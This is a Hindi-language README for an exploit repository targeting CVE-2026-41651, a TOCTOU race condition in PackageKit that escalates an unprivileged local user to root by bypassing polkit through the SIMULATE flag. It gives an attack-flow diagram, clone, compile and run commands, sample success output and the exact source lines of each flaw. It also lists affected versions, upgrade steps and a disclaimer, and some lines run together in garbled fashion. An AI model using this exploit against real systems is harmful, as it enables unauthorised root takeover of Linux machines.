
PackageKit की TOCTOU रेस कंडीशन (CVE-2026-41651) को लक्षित करने वाला स्थानीय विशेषाधिकार वृद्धि शोषण। Linux सिस्टम पर polkit बायपास और स्टेट मैनिपुलेशन के माध्यम से अनप्रिविलेज्ड उपयोगकर्ता से रूट तक वृद्धि करता है।
PackageKit डेमॉन को लक्षित करने वाला स्थानीय विशेषाधिकार वृद्धि शोषण।
TOCTOU रेस कंडीशन भेद्यता के माध्यम से एक अन-विशेषाधिकार प्राप्त स्थानीय उपयोगकर्ता सेrootतक वृद्धि।
CVE-2026-41651 (जिसे Pack2TheRoot के नाम से भी जाना जाता है) PackageKit में एक गंभीर TOCTOU (Time-Of-Check to Time-Of-Use) रेस कंडीशन भेद्यता है, जो कई Linux वितरणों द्वारा पैकेज प्रबंधन अमूर्तन के लिए उपयोग की जाने वाली एक सिस्टम सेवा है।
यह भेद्यता एक स्थानीय अन-विशेषाधिकार प्राप्त उपयोगकर्ता को विशिष्ट परिस्थितियों में PackageKit ट्रांज़ैक्शन स्थितियों में हेरफेर करने और प्राधिकरण जाँचों को बायपास करने की अनुमति देती है।
स्थानीय पहुँच वाला हमलावर निम्न कार्य करने में सक्षम हो सकता है:
root के रूप में निष्पादित करनाpolkit प्राधिकरण व्यवहार को बायपास करना| घटक | प्रभावित संस्करण | स्थिर संस्करण |
|---|---|---|
| PackageKit | 1.0.2 – 1.3.4 | 1.3.5 |
यह समस्या src/pk-transaction.c के अंदर कई तर्क दोषों से उत्पन्न होती है।
Attacker (unprivileged) packagekitd (root)
│ │
├── 1. InstallFiles(SIMULATE) ───────► │ polkit bypassed → state = READY
│ │ queued async dispatch
│
├── 2. InstallFiles(payload) ─────────► │ cached flags overwritten
│ │ invalid state transition ignored
│
│ [dispatch occurs] │
│ │ payload processed as root
│ │ maintainer scripts executed
│
└────────────────────────────────────► │ privilege escalation achieved
आवश्यक डेवलपमेंट लाइब्रेरी स्थापित करें:
sudo apt update
sudo apt install libglib2.0-dev
git clone https://github.com/Lutfifakee-Project/CVE-2026-41651.git
cd CVE-2026-41651
gcc -o exploit CVE-2026-41651.c \
`pkg-config --cflags --libs glib-2.0 gio-2.0` \
-Wall
एक अन-विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में चलाएँ।
./exploit
______ ______ ___ ___ ___ ____ ___________ _______
/ ___/ | / / __/___|_ |/ _ \|_ |/ __/____/ / < / __// __< /
/ /__ | |/ / _//___/ __// // / __// _ \/___/_ _/ / _ \/__ \/ /
\___/ |___/___/ /____/\___/____/\___/ /_//_/\___/____/_/
CVE-2026-41651 - PackageKit TOCTOU Local Privilege Escalation
═══════════════════════════════════════════════════════════════════
[*] Building packages...
[*] Starting race condition...
[*] Waiting for dispatch...
[*] Polling for payload...
[+] SUCCESS — privilege escalation completed
pkcon --version
या:
dpkg -l | grep packagekit
1.0.2 – 1.3.41.3.5 या बाद काsudo apt update
sudo apt upgrade packagekit
आधिकारिक रिलीज़:
यह रिपॉजिटरी केवल निम्नलिखित के लिए प्रदान की गई है:
लेखक इस परियोजना के कारण होने वाले किसी भी दुरुपयोग, अवैध गतिविधि या क्षति के लिए जिम्मेदार नहीं है।
इस सॉफ़्टवेयर का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।
| बग | स्थान | विवरण |
|---|
| BUG 1 | पंक्ति 4036 | InstallFiles() उचित स्थिति सत्यापन के बिना कैश्ड ट्रांज़ैक्शन फ़्लैग और पथों को अधिलेखित कर देता है |
| BUG 2 | पंक्तियाँ 876–881 | pk_transaction_set_state() पीछे की ओर स्थिति संक्रमणों को चुपचाप अस्वीकार कर देता है |
| BUG 3 | पंक्तियाँ 2273–2277 | pk_transaction_run() प्राधिकरण के बजाय डिस्पैच के दौरान कैश्ड फ़्लैग पढ़ता है |
| BYPASS | पंक्तियाँ 2893–2900 | SIMULATE फ़्लैग (0x4) polkit प्राधिकरण जाँचों को छोड़ देता है |